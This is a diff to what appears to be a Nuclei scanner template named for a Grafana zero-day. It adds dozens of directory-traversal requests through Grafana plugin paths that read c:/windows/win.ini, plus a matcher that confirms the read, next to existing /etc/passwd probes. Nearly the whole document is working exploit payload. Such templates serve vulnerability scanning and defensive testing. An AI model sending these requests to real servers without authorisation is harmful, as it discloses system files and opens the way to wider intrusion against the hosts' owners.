--- a/0day-grafana.yaml
+++ b/0day-grafana.yaml
@@ -65,6 +65,56 @@ requests:
       - "{{BaseURL}}/public/plugins/xychart/../../../../../../../../etc/passwd"
       - "{{BaseURL}}/public/plugins/zipkin/../../../../../../../../etc/passwd"
       - "{{BaseURL}}/public/plugins/grafana-clock-panel/../../../../../../etc/passwd"
+      - "{{BaseURL}}/public/plugins/alertGroups/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/icon/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/alertmanager/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/annolist/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/barchart/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/bargauge/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/canvas/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/cloudwatch/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/dashboard/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/dashlist/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/debug/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/elasticsearch/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/gauge/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/geomap/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/gettingstarted/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/grafana/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/graph/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/graphite/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/heatmap/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/histogram/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/influxdb/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/jaeger/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/live/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/logs/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/loki/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/mixed/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/mssql/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/mysql/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/news/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/nodeGraph/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/opentsdb/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/piechart/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/pluginlist/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/postgres/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/prometheus/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/stat/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/state-timeline/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/status-history/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/table-old/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/table/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/tempo/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/testdata/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/text/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/timeseries/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/welcome/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/xychart/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/zipkin/../../../../../../../../c:/windows/win.ini"
+      - "{{BaseURL}}/public/plugins/grafana-clock-panel/../../../../../../c:/windows/win.ini"
     stop-at-first-match: true
     matchers-condition: and
     matchers:
@@ -74,3 +124,4 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0"
+          - "for 16-bit app support"
